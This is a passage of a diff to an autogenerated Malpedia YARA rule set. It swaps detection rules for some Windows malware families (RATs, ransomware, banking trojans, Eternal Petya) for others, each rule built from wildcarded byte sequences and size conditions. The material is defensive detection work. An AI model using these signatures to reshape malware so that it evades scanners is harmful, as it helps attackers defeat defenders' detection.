-		$sequence_9 = { 57 50 ffd6 83c418 85db }
+		$sequence_0 = { e8???????? 89442430 85c0 0f841a010000 }
+		$sequence_1 = { 33d2 e9???????? 41c1ee04 33d2 83c6fc 418bce 83e10f }
+		$sequence_2 = { 488bce e8???????? 397e18 750b 834b40ff 33c0 e9???????? }
+		$sequence_3 = { 48895c2408 57 4883ec30 488bfa 33db 4885c9 7479 }
+		$sequence_4 = { 4883ec58 488bf1 bf01200480 8978a8 33db 48895818 448bf3 }
+		$sequence_5 = { e8???????? 3b4704 7513 4d897500 8b4708 33db 418907 }
+		$sequence_6 = { 4d85f6 741a 33d2 41b880010000 498bce ff15???????? 498bce }
+		$sequence_7 = { 488b7128 4885ff 0f84e1000000 4885f6 0f84d8000000 488d8424c0000000 4889442420 }
+		$sequence_8 = { 81790800000306 7308 418bc6 e9???????? 488d842418010000 4889442420 41b9a0000000 }
+		$sequence_9 = { 897918 488b03 488b8898000000 89791c 488b03 488b8898000000 c7413809000000 }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 589824
 }
-rule MALPEDIA_Win_Dinodas_Rat_Auto : FILE
+rule MALPEDIA_Win_Reedbed_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "431aac36-5429-5cb6-a22f-6d22f4b46964"
+		id = "74769a46-8253-5d47-b255-0c21b0e137a7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dinodas_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dinodas_rat_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.reedbed"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.reedbed_auto.yar#L1-L143"
 		license_url = "N/A"
-		logic_hash = "f12d1a523704ecc621dca1f8d26285a0bb3fbc82969aec41d1e0b2ffd38a67b5"
+		logic_hash = "9739a2569b16e57b90481814e6cc540a2c3a0da3aecf12af2fc73ab886c25305"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95764,32 +96030,36 @@ rule MALPEDIA_Win_Dinodas_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bf0 33c9 83c404 8975ec 3bf1 745c 8b4704 }
-		$sequence_1 = { ffd2 8b9d94fdffff 8d8da0fdffff 51 53 ff15???????? }
-		$sequence_2 = { c745a80f000000 e8???????? c645fc01 a1???????? 6aff 50 ff15???????? }
-		$sequence_3 = { 8d45b4 e9???????? 8d45a8 e9???????? 8d75d4 e9???????? 8d75b8 }
-		$sequence_4 = { 6a00 6a01 ff15???????? 8bf8 85ff 741a 6a00 }
-		$sequence_5 = { 8d4d9c 68???????? 51 e8???????? 83c40c 397594 720c }
-		$sequence_6 = { 8bce 8bf3 83f804 7217 8d4900 8b16 3b11 }
-		$sequence_7 = { 8b4204 ffd0 8b4d0c 51 e8???????? 83c404 8937 }
-		$sequence_8 = { 83e810 e8???????? 8d7010 8975c4 c645fc07 8b4714 }
-		$sequence_9 = { 8d75b8 e9???????? 8d759c e9???????? 8db578ffffff e9???????? 8db548ffffff }
+		$sequence_0 = { 33c9 e8???????? 488b0d???????? 488981c2140000 }
+		$sequence_1 = { 33c9 ff15???????? 85c0 751e }
+		$sequence_2 = { 4885c9 7405 e8???????? 33c0 0f57c0 }
+		$sequence_3 = { eb19 488d15e3d10100 eb10 488d15cad10100 eb07 488d15b5d10100 4533c0 }
+		$sequence_4 = { 4c8d0d44e50000 b919000000 4c8d0534e50000 488d1531e50000 e8???????? }
+		$sequence_5 = { 488bd8 4885c0 7431 488bc8 ff15???????? 83f8ff }
+		$sequence_6 = { 8364244000 4c8d4c2440 baffff0000 c744242004000000 41b801000000 }
+		$sequence_7 = { 488b83a6140000 4c8974080e 4883c13f 483bcf 7ceb e8???????? 33c9 }
+		$sequence_8 = { c7450400000000 c7452400000000 488b8548010000 83780a00 }
+		$sequence_9 = { c7450400000000 c7452400000000 488b85a0010000 4883b8a614000000 }
+		$sequence_10 = { c7450400000000 83bd0801000000 7515 488d15ce130f00 }
+		$sequence_11 = { c7450400000000 ba01000000 b900003f00 e8???????? }
+		$sequence_12 = { c7450400000000 c7452400000000 488b8540010000 8b808c140000 }
+		$sequence_13 = { c7450400000000 837d0400 7534 488b8580010000 }
 
 	condition:
-		7 of them and filesize < 638976
+		7 of them and filesize < 3760128
 }
-rule MALPEDIA_Win_Underminer_Ek_Auto : FILE
+rule MALPEDIA_Win_Zeroaccess_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "25419d82-2049-52ba-8173-e803bede2897"
+		id = "b43bafa0-7845-5d97-89eb-71fc1e8384a0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.underminer_ek"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.underminer_ek_auto.yar#L1-L168"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zeroaccess_auto.yar#L1-L139"
 		license_url = "N/A"
-		logic_hash = "cef777a253424ada6724fda25a7a7fc2a7d290e0894ee3bdc7ea6fd0d09bd9ea"
+		logic_hash = "58e6fa201d2edf5394810209f43ab6a140ff615859a9e38ec78386b3f1a7fa21"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95803,38 +96073,36 @@ rule MALPEDIA_Win_Underminer_Ek_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 e8???????? 83c404 53 e8???????? 83c404 8b551c }
-		$sequence_1 = { 25ffff0000 3d4ee640bb 7404 3bc1 7501 }
-		$sequence_2 = { 83c40c 66394e06 894d10 7630 83c710 8b07 }
-		$sequence_3 = { 03c3 8901 eb18 3daafc0d7c }
-		$sequence_4 = { 7463 8b55f4 8b0495582c4300 f644382848 }
-		$sequence_5 = { 8ad0 8adc 88550f 807e0700 7417 0fb6813051fa7e 8a4dff }
-		$sequence_6 = { 6a06 53 ff7508 53 ff55f0 85c0 7c07 }
-		$sequence_7 = { 0f8535010000 83bd88feffff00 0f85a4040000 807d9a01 }
-		$sequence_8 = { 885c012e 8b0495582c4300 804c012d04 46 }
-		$sequence_9 = { c745f800000000 0f8444040000 837d3000 0f843a040000 }
-		$sequence_10 = { 0f8776050000 52 51 e8???????? 83c408 c745c000000000 }
-		$sequence_11 = { c745fc20000000 eb21 8bd0 83e220 }
-		$sequence_12 = { 3e58 3e7f3e 98 3e4a }
-		$sequence_13 = { 47 8d5101 0f1f8000000000 8a01 41 84c0 }
-		$sequence_14 = { 66895dc0 ff7508 895dec ab ff760c 895df8 ab }
-		$sequence_15 = { e8???????? 83c410 eb03 8d041a 5b 5d c3 }
+		$sequence_0 = { ff15???????? 85c0 7408 ff15???????? eb02 }
+		$sequence_1 = { 8b01 ff761c ff7618 ff5004 }
+		$sequence_2 = { 50 68???????? 6889001200 8d45fc }
+		$sequence_3 = { 6a01 8d45f4 50 ff7608 ff15???????? }
+		$sequence_4 = { 48 83c9ff c744242804000000 48 }
+		$sequence_5 = { 3bf8 730e 2bc7 e8???????? }
+		$sequence_6 = { 68060000c8 ff7708 ff15???????? 85c0 }
+		$sequence_7 = { 6a10 68???????? 68060000c8 ff7708 }
+		$sequence_8 = { 740c bf03000040 eb05 bf010000c0 85ff }
+		$sequence_9 = { 3bc1 7604 83c8ff c3 }
+		$sequence_10 = { ff15???????? 85c0 7407 b8e3030000 }
+		$sequence_11 = { 89742438 897c2448 e8???????? 48 }
+		$sequence_12 = { eb06 ff15???????? 48 8b9520020000 4c }
+		$sequence_13 = { 85c0 750c 8d7808 e8???????? ffcf 75f7 833d????????06 }
 
 	condition:
-		7 of them and filesize < 466944
+		7 of them and filesize < 464896
 }
-rule MALPEDIA_Win_Chaperone_Auto : FILE
+rule MALPEDIA_Win_Banjori_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5d73acaa-0673-57ad-848f-864644fbbeea"
+		id = "b7079fb2-7d83-5fd6-84aa-1cae4150d033"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chaperone"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chaperone_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.banjori"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.banjori_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "891c6d4b90ff2712f27f9dbb971bf9587d22b60dd85391f9a0f86beba2f74383"
+		logic_hash = "816a568e5c1724a9f1a3d5f87d5d1a32e57fcc3fa600870ee04fd6629cdfe757"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95848,32 +96116,32 @@ rule MALPEDIA_Win_Chaperone_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b442458 4839442428 0f8dd0000000 0fb6442421 83c001 }
-		$sequence_1 = { ff15???????? 48898424902b0000 488d742470 488bbc24902b0000 b990180000 }
-		$sequence_2 = { b9ffff1f00 ff15???????? 4889842450020000 4883bc245002000000 0f842b020000 4c8d842458020000 baff010f00 }
-		$sequence_3 = { 48898424c0020000 837c243400 746b 4c8b842490000000 8b542434 488b8c24c0020000 }
-		$sequence_4 = { 488d7c2450 488d35fba70000 b926000000 f3a4 }
-		$sequence_5 = { 4889542410 48894c2408 4883ec48 488b442460 0fb68000010000 88442421 }
-		$sequence_6 = { 488b0424 480590180000 48890424 ebb7 488b442420 }
-		$sequence_7 = { 85c0 750a b801000000 e9???????? 488d442440 4889842498030000 488d842460030000 }
-		$sequence_8 = { 4533c9 4533c0 33d2 33c9 e8???????? 488d158a090100 }
-		$sequence_9 = { 488bd9 448d6eff 443bd7 754f 4c8d0565ce0000 458bcd ba00010000 }
+		$sequence_0 = { 75f1 b0ec fd f2ae 817ffd8bff558b 75f5 fc }
+		$sequence_1 = { ff15???????? ff75ec ff15???????? 40 50 ff75ec 6a01 }
+		$sequence_2 = { ff75f8 ff15???????? 8d3dac169500 57 ff15???????? 40 50 }
+		$sequence_3 = { 53 53 53 8d45ec 50 ff75f0 ff75f8 }
+		$sequence_4 = { 8985b0feffff 83f864 0f82c2000000 40 50 6a40 ff15???????? }
+		$sequence_5 = { 395df0 741b 53 53 53 53 53 }
+		$sequence_6 = { e9???????? 55 8bec 83c4f4 57 56 53 }
+		$sequence_7 = { 0145f4 6a42 ff75f4 ff75f8 ff15???????? 8945f8 ff75dc }
+		$sequence_8 = { 68f1000000 51 ff15???????? 8b4e08 e32c 894de4 895de8 }
+		$sequence_9 = { 7808 3d64696a6e 90 7507 e8???????? ebc7 ff35???????? }
 
 	condition:
-		7 of them and filesize < 373760
+		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Tellyouthepass_Auto : FILE
+rule MALPEDIA_Win_Citadel_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "354e0e6c-ccce-5215-81be-86e86c2d035f"
+		id = "405c8c54-58ec-5453-982e-e98970e4bd4a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tellyouthepass"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tellyouthepass_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.citadel_auto.yar#L1-L160"
 		license_url = "N/A"
-		logic_hash = "dc25f522d82a6df0aaae3de9d80ac3b6a17f46baeb51d065b8c3d1eda2c481dc"
+		logic_hash = "9d24b0310c4a8508a9f96dd7e09a8073428bd68f73c4d97c0967ade9f8cc7c1c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95887,32 +96155,38 @@ rule MALPEDIA_Win_Tellyouthepass_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b0d???????? eb0a 488b4c2448 488b5c2420 48894c2440 48895c2428 488d050b4e1000 }
-		$sequence_1 = { 4d85c0 7f1d 488b8c24f0000000 488b9424f8000000 488b9c24a8010000 e9???????? 4889bc2418010000 }
-		$sequence_2 = { f20f10442440 e8???????? 488d051a1f1a00 bb0c000000 6690 e8???????? e8???????? }
-		$sequence_3 = { 80f902 7345 884c2417 0fb6d1 4889542420 48c1e206 488d35728f3000 }
-		$sequence_4 = { 48c740102c000000 833d????????00 750d 488d0d57b70600 48894808 eb10 488d7808 }
-		$sequence_5 = { 4c8b4028 4c8b4830 4c8b5020 488dbc2490010000 488d3585530b00 48896c24f0 488d6c24f0 }
-		$sequence_6 = { 6690 eb10 488d7a70 488d155b4b0d00 e8???????? 90 488b15???????? }
-		$sequence_7 = { bb06000000 90 e8???????? 488b442410 e8???????? 488d0525631700 bb0b000000 }
-		$sequence_8 = { eb09 4889c7 90 e8???????? 488d0514690e00 488b5c2438 488d0d73e11000 }
-		$sequence_9 = { eb14 488d7818 488b8c24c0020000 0f1f00 e8???????? 48c740100b000000 488d0d9ed01300 }
+		$sequence_0 = { eb0e 6800800000 53 57 }
+		$sequence_1 = { 03f7 6a0d 5f e8???????? }
+		$sequence_2 = { 3d00002003 7715 8b4d08 890e }
+		$sequence_3 = { 50 57 e8???????? 33db 3c01 }
+		$sequence_4 = { 41 66395802 7405 83c002 }
+		$sequence_5 = { a1???????? 57 e8???????? 8945fc 3bc3 }
+		$sequence_6 = { ff15???????? 85c0 0f8566010000 57 57 57 }
+		$sequence_7 = { 33c9 663918 7507 41 }
+		$sequence_8 = { eb81 d0e9 3aca 73fa 0fb6c9 8b04c8 ebae }
+		$sequence_9 = { 8b5004 0310 8d7101 3bf2 }
+		$sequence_10 = { 6685c0 7432 66ff460e 6639460e 7228 }
+		$sequence_11 = { 33c0 85c0 7409 3255fd }
+		$sequence_12 = { 6685c0 7432 66ff460c 6639460c }
+		$sequence_13 = { 5b b001 eb30 d0e8 }
+		$sequence_14 = { 85c0 740b 8a5604 8a4e01 ffd0 884601 33c0 }
+		$sequence_15 = { ffd0 8807 fe45ff 8a45ff 3a06 72c4 0fb7460a }
 
 	condition:
-		7 of them and filesize < 7152640
+		7 of them and filesize < 1236992
 }
-rule MALPEDIA_Win_Daolpu_Auto : FILE
+rule MALPEDIA_Win_Eternal_Petya_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3b0894e5-1a8e-5546-8c9e-1b741fdf5950"
+		id = "0622b1c6-50a1-59bf-9c9e-674c89b8f214"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.daolpu"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.daolpu_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.eternal_petya_auto.yar#L1-L112"
 		license_url = "N/A"
-		logic_hash = "8005f7b5dce3eec7097b3ee19274ed96f4a8267ee8f070756b8e93cef441b9c0"
+		logic_hash = "dc100556655eac63f6dd0a579c598175f64f6a920c350da1549a31a39dd0acc6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95926,32 +96200,32 @@ rule MALPEDIA_Win_Daolpu_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7506 4883c460 5b c3 a804 7409 488d1dbe721100 }
-		$sequence_1 = { 7439 488b442470 488b8080000000 4883c008 4889442438 488b442470 488b4c2438 }
-		$sequence_2 = { 498bf8 488bf2 488bd9 0f85bc000000 80b9ae0a000000 0f85af000000 41b80f000000 }
-		$sequence_3 = { 48ffca 4d85f6 75ec e9???????? 83f840 0f85d0000000 4d8b7610 }
-		$sequence_4 = { 897c2428 448be2 44896c2424 8944242c 3801 0f8411050000 0f1f840000000000 }
-		$sequence_5 = { e8???????? 8b442428 c1f806 4898 488d0da3a10600 8b542428 83e23f }
-		$sequence_6 = { 498b4c2448 ff15???????? 0f104500 488bcd 410f110424 0f104d10 410f114c2410 }
-		$sequence_7 = { 66ffc3 66413bdf 0f864fffffff 488d15adc40a00 498bce e8???????? e9???????? }
-		$sequence_8 = { 7501 cc 48c744242000000000 41b951050000 4c8d05cd131200 488d158e141200 488d0dff151200 }
-		$sequence_9 = { e8???????? 0f57c0 f30f7f4558 4c896568 488b4d50 4c896550 ba10000000 }
+		$sequence_0 = { 8d4644 50 53 6a02 }
+		$sequence_1 = { 8bec 51 57 68000000f0 6a18 33ff }
+		$sequence_2 = { 68f0000000 6a40 ff15???????? 8bd8 }
+		$sequence_3 = { 57 68000000f0 6a18 33ff }
+		$sequence_4 = { 55 8bec 51 57 68000000f0 }
+		$sequence_5 = { 55 8bec 51 57 68000000f0 6a18 }
+		$sequence_6 = { 53 8d4644 50 53 }
+		$sequence_7 = { 55 8bec 51 57 68000000f0 6a18 33ff }
+		$sequence_8 = { 51 57 68000000f0 6a18 }
+		$sequence_9 = { 53 68f0000000 6a40 ff15???????? }
 
 	condition:
-		7 of them and filesize < 2877440
+		7 of them and filesize < 851968
 }
-rule MALPEDIA_Win_Quickheal_Auto : FILE
+rule MALPEDIA_Win_Opachki_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "32c5b738-c920-5a30-a6ba-c9a05fe50d12"
+		id = "e10cd0eb-a431-57d1-b7ee-f206637aeb79"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quickheal"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.quickheal_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.opachki_auto.yar#L1-L158"
 		license_url = "N/A"
-		logic_hash = "b1666ee1e28f71dc83ee325a607900259e0027addcd09d0a51064c380d4fc4c7"
+		logic_hash = "9a87a4a85fda49db5f8b260ce2dd4c073885fccbbbb43ca421b7fe7db663b448"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95965,32 +96239,37 @@ rule MALPEDIA_Win_Quickheal_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 8d7c2431 c78424ec0300001c010000 f3ab 66ab }
-		$sequence_1 = { 66898c2494040000 b940000000 f3ab c784249800000003000000 c78424cc000000058288a2 }
-		$sequence_2 = { 8b542414 6a07 52 895c2478 895c247c }
-		$sequence_3 = { 8944242c 55 e9???????? ffd6 68???????? 57 8944243c }
-		$sequence_4 = { 89542450 f7d1 89542454 49 8bf9 8d043f 50 }
-		$sequence_5 = { 7527 85ed 7523 8b4c2414 e8???????? 53 892d???????? }
-		$sequence_6 = { 8d5c2410 83c404 8944240c c1eb04 8d740704 e8???????? 3206 }
-		$sequence_7 = { ffd7 3bc3 0f845d040000 8d8c24d8150000 2bc6 }
-		$sequence_8 = { 23e9 f7d2 23d6 0bd5 8b6c243c 03d5 03da }
-		$sequence_9 = { 8b542420 c1f802 8d0440 3bd0 0f8c8e030000 8d46fc 53 }
+		$sequence_0 = { eb69 8b5508 8b4904 53 }
+		$sequence_1 = { 57 6a0d 68???????? 8d4ddc e8???????? 68ff000000 }
+		$sequence_2 = { c3 55 8bec 81ec00010000 ff7508 }
+		$sequence_3 = { ff15???????? 8d8500ffffff 50 ff7508 e8???????? 59 59 }
+		$sequence_4 = { 034604 50 ff15???????? 8b4708 }
+		$sequence_5 = { 57 8b7d0c 8a0f 894508 84c9 744d 8a10 }
+		$sequence_6 = { 894708 c6040800 5b 5f }
+		$sequence_7 = { 33c0 c706???????? 894608 89460c 894604 e8???????? 8bc6 }
+		$sequence_8 = { 2b442424 aa 8944241c 61 }
+		$sequence_9 = { ebc1 3c67 7507 884705 b301 ebb6 }
+		$sequence_10 = { 00f0 8a0c01 f6c101 0f84b9000000 ac 884708 88c5 }
+		$sequence_11 = { 31db 99 b125 f3aa }
+		$sequence_12 = { 83c140 eb0a 3ca0 7206 }
+		$sequence_13 = { 08db 752b 46 88470c 88c4 c0ec06 }
+		$sequence_14 = { 08db 7409 80fe06 750b }
 
 	condition:
-		7 of them and filesize < 553984
+		7 of them and filesize < 122880
 }
-rule MALPEDIA_Win_Nokoyawa_Auto : FILE
+rule MALPEDIA_Win_Slowstepper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5fa67854-5271-511e-bc7c-fd346224ae86"
+		id = "83f15ae7-3874-55c6-9009-11d19ac08b8c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokoyawa"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nokoyawa_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slowstepper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.slowstepper_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "d0e099f2b3c7d0be14ed25c33931a83caac7b50df6157dc4628f695a1c582f8e"
+		logic_hash = "dd0e842f62bc92cdd486a9615b960e4b584259d9116f2837f2c07d72a5000be5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96004,32 +96283,32 @@ rule MALPEDIA_Win_Nokoyawa_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 88040a 8b442420 83c010 4898 8b4c2420 83c12c 4863c9 }
-		$sequence_1 = { e8???????? 488905???????? c744243000000000 eb0a 8b442430 ffc0 89442430 }
-		$sequence_2 = { 89448c30 4863442420 8b4c2420 c1e102 }
-		$sequence_3 = { c1e01e 8b4c2408 c1e902 0bc1 89442408 33c0 85c0 }
-		$sequence_4 = { 33d2 488b442430 488b4850 e8???????? }
-		$sequence_5 = { 8bca 8b942438010000 03d1 8bca 8d84089979825a 8b4c2410 }
-		$sequence_6 = { 85c0 7411 488b542468 488b4c2460 e8???????? eb0a 488b4c2460 }
-		$sequence_7 = { 486bc000 488b4c2440 8b542420 39540114 7326 b804000000 486bc001 }
-		$sequence_8 = { e8???????? 85c0 742a 4c8b8c24c8000000 4c8b8424c0000000 488b9424b8000000 }
-		$sequence_9 = { c644242b61 c644242c6e c644242d64 c644242e20 c644242f31 c644243036 c64424312d }
+		$sequence_0 = { 6a04 43 53 50 8945d4 8975e0 8975dc }
+		$sequence_1 = { e8???????? b001 e8???????? c3 68a4020000 b8???????? e8???????? }
+		$sequence_2 = { 83661000 83c414 8d45b8 c746140f000000 50 8bce c60600 }
+		$sequence_3 = { c645fc4c e8???????? 57 c645fc4b 56 8d8dcceeffff e8???????? }
+		$sequence_4 = { 85c0 746b 395c241c 765e 53 ff742420 8d8c2474050000 }
+		$sequence_5 = { 59 85c0 7507 c605????????01 68???????? 8d9564ebffff 8bce }
+		$sequence_6 = { 57 8d4db8 e9???????? 6a48 b8???????? e8???????? 8b4508 }
+		$sequence_7 = { 8b8d70faffff 8d85ecfaffff 50 8d85ecfeffff 50 e8???????? 59 }
+		$sequence_8 = { ff6008 55 8bec 8b4904 8b01 5d ff600c }
+		$sequence_9 = { 6bc00c 8d8405b8feffff 8d8da8feffff 3bc1 7422 8b08 8b95a8feffff }
 
 	condition:
-		7 of them and filesize < 92160
+		7 of them and filesize < 909312
 }
-rule MALPEDIA_Win_Unidentified_071_Auto : FILE
+rule MALPEDIA_Win_Dorshel_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cfbea96e-4359-5ae7-941b-244ed79d12c2"
+		id = "550d8628-f52a-56de-91a7-ece0c38b96fb"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_071"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_071_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dorshel_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "2aec891397e4f33ea521c1dfdd2bf39deb44b46ee917346f946ae37d0a5d367f"
+		logic_hash = "364203df24c6a83e17731caab6caa244bb9a531055fdc65fef6d763de8c4fb40"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96043,32 +96322,32 @@ rule MALPEDIA_Win_Unidentified_071_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 837c241002 740b 837c241003 7504 6a0b }
-		$sequence_1 = { a1???????? 0d00020000 a3???????? e8???????? }
-		$sequence_2 = { 56 55 e8???????? 8d4701 89742420 }
-		$sequence_3 = { c1e902 57 33ff 3b550c 0f47c8 85c9 7413 }
-		$sequence_4 = { 53 56 57 e8???????? 83c418 eb10 83f802 }
-		$sequence_5 = { 3bf3 7408 53 8bce e8???????? 83ed10 83eb10 }
-		$sequence_6 = { 0faf05???????? 53 56 8b35???????? }
-		$sequence_7 = { 8bec 8b550c 8b4d10 8b4214 2b4210 394110 7615 }
-		$sequence_8 = { c21000 e8???????? cc 8b442408 56 8b742408 }
-		$sequence_9 = { a3???????? a1???????? 83e040 59 a3???????? }
+		$sequence_0 = { 55 8bec 83ec0c 31c0 648b5030 8b520c 8b5214 }
+		$sequence_1 = { 8d7708 8b3f 33fb f3a4 5f }
+		$sequence_2 = { 03f8 84c0 75f6 81ff5e515e83 7408 81ff36cadb30 75da }
+		$sequence_3 = { 83c004 e2f9 58 54 50 }
+		$sequence_4 = { 51 8b0f 33cb 51 ff55f8 8b5df4 }
+		$sequence_5 = { 54 50 8b4f04 33cb 51 8b0f }
+		$sequence_6 = { ffd5 85c0 74cd 8b07 01c3 }
+		$sequence_7 = { ac c1cf0d 03f8 84c0 75f6 81ff5e515e83 7408 }
+		$sequence_8 = { 57 6800200000 53 56 68129689e2 ffd5 85c0 }
+		$sequence_9 = { 5f 8b4704 33c3 83c104 99 }
 
 	condition:
-		7 of them and filesize < 1220608
+		7 of them and filesize < 24576
 }
-rule MALPEDIA_Win_Thanatos_Ransom_Auto : FILE
+rule MALPEDIA_Win_Bka_Trojaner_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "36dfbc1b-2a7c-5015-aa84-898c9ae8a989"
+		id = "ef77dd44-0b56-55a7-bd80-bb8aedf02909"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos_ransom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.thanatos_ransom_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bka_trojaner"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bka_trojaner_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "0a185fa4c8cc02cde8300ce206abe6802953ff20e929d9c3889dfecd7dc1e60f"
+		logic_hash = "f15473c37bfc124735dc99ab7490e1138bd0e34fbe32e10f0ddc7571161a090f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96082,34 +96361,34 @@ rule MALPEDIA_Win_Thanatos_Ransom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 837f1410 7240 8b4714 8b0f 40 3d00100000 722a }
-		$sequence_1 = { 50 e8???????? 83ec18 c645fc13 8bcc c741140f000000 c7411000000000 }
-		$sequence_2 = { f20f591c8580e94200 f20f592c8580e94200 03c0 660f58348590ed4200 660f5625???????? f20f58f0 }
-		$sequence_3 = { 6bc930 f6451402 8b0485e0774300 c644082900 }
-		$sequence_4 = { c64405e800 40 83f804 7cef 33f6 0f1f440000 8a4435e8 }
-		$sequence_5 = { c645fc14 8d4dd8 e8???????? 83c404 68???????? 8bd0 }
